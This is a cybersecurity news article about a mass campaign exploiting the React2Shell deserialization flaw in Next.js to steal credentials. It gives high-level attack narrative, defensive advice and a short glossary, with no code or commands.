React2Shell: How a Zero-Click Next.js Flaw Fueled a 24-Hour Credential Heist

It started quietly: a hacker’s scanner pinged an unassuming web app built on Next.js. Minutes later, a sophisticated script was tunneling deep into the server’s memory, siphoning off secrets with surgical precision. By the time most defenders woke up, at least 766 hosts across the globe had already been compromised - victims of a new, mass-scale campaign exploiting the so-called React2Shell vulnerability. The operation, tracked as UAT-10608, is a stark reminder that in the cloud era, a single bug can open the floodgates for industrialized cybercrime.

Inside the React2Shell Breach: Anatomy of a Lightning-Fast Attack

The breach hinges on a flaw with a perfect 10.0 CVSS score: CVE-2025-55182, better known as React2Shell. This vulnerability lurks in React Server Components, a foundational part of Next.js, and allows attackers to execute arbitrary code on a server before any authentication checks - a “zero-click” gateway for hackers.

Armed with mass-internet scanning tools like Shodan and Censys, threat group UAT-10608 swept the web for exposed Next.js applications. Once a vulnerable target was found, the attackers sent a booby-trapped data payload directly to a server endpoint. The flaw? Next.js would unwittingly deserialize this data, letting the attackers’ code run freely inside the Node.js process.

From there, automation took over. A lightweight dropper fetched a multi-phase shell script, which quietly harvested a treasure trove of secrets: everything from environment variables and SSH keys to cloud tokens, Docker configs, and even payment platform credentials. Each phase’s loot was logged and uploaded to NEXUS Listener - a custom, password-protected backend where attackers could browse stolen data by victim, credential type, or attack stage.

Data from an exposed NEXUS Listener instance revealed the scale: over 10,000 files exfiltrated, affecting organizations across industries and geographies. The exposed information wasn’t just valuable for immediate theft (like database access or payment fraud); it also mapped out victims’ infrastructure for future attacks, lateral movement, or resale to other cybercriminals. Particularly dangerous was the leak of SSH keys - long-lived credentials that, if reused, could enable persistent, stealthy access even after the initial breach is discovered.

Investigators warn that the campaign’s automation and “spray-and-pray” tactics mean no cloud or web team can assume safety. The only defense: patching all vulnerable Next.js and React Server Component deployments, rotating stolen secrets, and auditing for suspicious access. With the campaign still unfolding, the clock is ticking for organizations to close this gaping hole before the next wave hits.

Conclusion

The React2Shell breach is a case study in how software supply chain flaws and automation have supercharged cybercrime. As attackers move faster and cast wider nets, even small configuration mistakes or slow patching can have devastating, cascading consequences. In the aftermath, one lesson is clear: in today’s threat landscape, every unpatched server is a ticking time bomb.

WIKICROOK

• Remote Code Execution (RCE): Remote Code Execution (RCE) is when an attacker runs their own code on a victim’s system, often leading to full control or compromise of that system.
• Deserialization: Deserialization converts data into usable program objects. If not done securely, it can let attackers inject harmful instructions into applications.
• SSH Key: An SSH key is a digital credential that enables secure, passwordless access to remote servers. If compromised, it can allow unauthorized system access.
• Environment Variable: An environment variable is a key-value pair storing configuration data, often used for secrets like API keys, enhancing security in software environments.
• C2 (Command and Control): C2 (Command and Control) is infrastructure used by attackers to remotely manage, control, and communicate with malware on compromised devices.